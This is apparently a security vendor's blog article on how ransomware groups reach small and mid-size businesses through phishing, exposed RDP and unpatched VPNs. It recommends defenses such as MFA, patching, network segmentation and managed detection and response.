Initial access into the organization’s network can come from one little thing that may seem harmless at first—a legit-looking phishing message, an unpatched VPN, or exposed remote desktop (RDP).

Once the attacker has their beachhead, they don’t always have to be sophisticated. Oftentimes, it’s just an attacker who is abusing your open endpoint and using easily obtained ransomware-as-a-service (RaaS) kits. They’re not looking to outsmart your SIEM with advanced TTPs—they just won’t stop trying until they find a pattern you didn’t account for.

Recent examples include attacks that leveraged unpatched VPN vulnerabilities, compromised credentials through phishing campaigns, and exploited publicly-accessible RDPs. LockBit affiliates, one of the largest ransomware groups before disruption in 2024, frequently exploited RDP services to infiltrate networks. The BlackCat (ALPHV) operation used social engineering and phishing to steal credentials across healthcare and critical infrastructure. The Cactus ransomware group systematically targeted organizations with unpatched VPN appliances, particularly Fortinet and SonicWall vulnerabilities.

Attackers typically follow a predictable pattern. They usually gain initial access through:

• Credential phishing: Attackers craft legitimate-looking emails that trick users into handing over their login information.

• Remote access endpoints: Exposed RDP endpoints to the internet are still a big thing. Businesses continue to leave these services accessible without adequate protection.

• VPN vulnerabilities: Unpatched VPN appliances, like SonicWall vulnerabilities, are attractive targets for attackers who actively scan for and exploit these known weaknesses.

After compromising an endpoint, attackers elevate privileges, establish persistence, and move laterally to find valuable data.

They'll abuse admin tools already installed in your environment. PowerShell execution used for malicious purposes can appear identical to normal admin tasks in your monitoring solutions, making detection challenging without proper context.

SMBs often don’t think they’re big or popular enough for "real" ransomware attackers. But SMB ransomware incidents are on the rise as they face the same attack tools and techniques as larger organizations, but often have fewer resources to defend against them.

Recent ransomware case studiesshow that many SMB organizations lacked sufficient visibility into endpoint and identity telemetry. Security logs get passed by because there's no dedicated security analyst to monitor them.

Visibility is consistently one of the most critical gaps. In cases like the Evolve Bank breach, attackers had nearly four months of dwell time before detection. Security teams didn't detect ransomware infections in time to respond effectively. They also missed critical indicators like compromised credentials accessing files outside normal patterns, unfamiliar processes running on endpoints, and anomalous outbound network traffic that signaled data exfiltration or command and control communication.

As written in the Huntress 2025 Cyber Threat Report, ransomware operators are increasingly leaning into double extortion strategies, like stealing data before encrypting it, making early detection of data exfiltration even more important.

There are a few things you can do to avoid becoming the next ransomware case study.

Secure access points at your network perimeter

Firewall rules and VPNs provide important perimeter security, but only get you so far. If a cybercriminal succeeds at penetrating your defenses, you need to know what they’re doing inside your environment. Start with these fundamentals before an attack happens:

• Implement MFA everywhere: Even if attackers obtain username and password combinations, multi-factor authentication (MFA) prevents them from using those credentials to access your systems.

• Keep a rigorous patching schedule: Applications, VPNs, and RDP endpoints all have vulnerabilities. When software is up-to-date with security patches, it closes off known vulnerabilities that ransomware hackers frequently target.

• Implement network segmentation: Network segmentation prevents lateral movement. If an attacker gets in, they can only do so much damage if it's contained to a small area of your network.

• Practice your incident response plan: Your incident response plan should define escalation paths, stakeholder communication, data backup and recovery, and containment actions to take during specific attacks. Tabletop exercises make sure everyone knows their role during an incident and prepare them to perform when faced with pressure.

Focus on detection and response

Strengthen detection and response with comprehensive network and endpoint visibility.

 Huntress Managed EDR provides endpoint visibility to detect ransomware activity before encryption begins, while Huntress Managed SIEM correlates security logs across your infrastructure to catch suspicious patterns that individual endpoints might miss.

Contain threats quickly

Speed matters. If you detect suspicious activity, contain it immediately—delays mean more damage and compromised systems. Huntress research shows attackers take an average of 17 hours from initial access to ransomware deployment.

Include human-led investigations

Automated tools are essential, but human analysts can identify subtle behavioral nuances that your security tools may miss. Combining automated detection with expert human investigation reduces your time to containment and improves the accuracy of threat identification.

Implement behavioral analysis

Behavioral analysis helps you identify activities that don't align with normal user patterns. When admin tools like PowerShell suddenly execute commands outside their normal usage patterns, that's a red flag. Detecting these actions early can stop breaches before they escalate.

Attacks succeed when organizations lack visibility, respond slowly, or dismiss early warnings. They fail when defenders detect suspicious activity quickly and contain it before encryption begins.